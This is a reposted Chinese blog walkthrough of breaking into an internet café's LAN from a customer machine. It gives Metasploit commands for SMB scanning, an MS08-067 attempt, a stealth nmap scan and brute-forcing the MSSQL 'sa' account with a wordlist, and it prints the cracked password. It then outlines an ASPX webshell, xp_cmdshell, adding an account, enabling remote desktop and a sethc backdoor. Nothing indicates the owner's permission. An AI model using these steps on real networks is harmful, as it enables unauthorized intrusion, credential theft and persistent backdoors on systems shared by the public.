网吧内网渗透

0X01 准备

vmware，Kali linux，啊D网络工具包

0x02 初探

我上网的这台电脑IP是192.168.21.128

先使用kali linux虚拟机对整个网络进行扫描！

然发现192.168.1.1 开放了23 telnet 端口！（为什么只扫到了1.x网段呢？）详解移步

之前是打算用armitage，但是不知道为什么一直连接不上！

用啊D直接对整个网络进行扫描 192.168.1.0-192.168.255.255

过了漫长的时间，扫出192.168.3.99 开放了445 端口

打开kali 用msf进行一下深入扫描(smb_version 协议扫描)

首先启动msf

msfconsole

search smb_version

use auxiliary/scanner/smb/smb_version

show options

set RHOST 192.168.3.99

run

之后我们会发现系统版本和补丁信息

windows XP sp3

然后再利用ms08_067对目标进行一次攻击

然而我们想的太简单了，攻击失败，没有返回目标的shell

对目标进行一次隐秘的端口扫描

db_nmap -sS -Pn 192.168.3.99

 

发现1433端口开放

使用msf下的mssql_login破解sa的密码

search mssql_login

use 破解脚本

set PASS_FILE /usr/share/wordlists/rockyou.txt

set RHOST 192.168.3.99

exploit

图上看到的

[+] 192.168.3.99:1433 - LOGIN SUCCESSFUL: WORKSTATION\sa:123456

密码出来了， 123456
我们再加载一个 payload
如下图

msf  并没有为攻击者返回 meterpreter 会话
那么我们就手工来获取对方权限
首先下载一个 aspx 本地环境
弄一个 aspx 大马
输入 mssql 目标和账户密码进行链接
创建 cmdshell
执行系统命令
添加账户，开启 3389 之后，考虑到对方是 xp 便没有登录
可以考虑劫持 sethc 或者其他后门程序！
以上操作请往下看图

转载于:https://www.cnblogs.com/askDing/p/5109596.html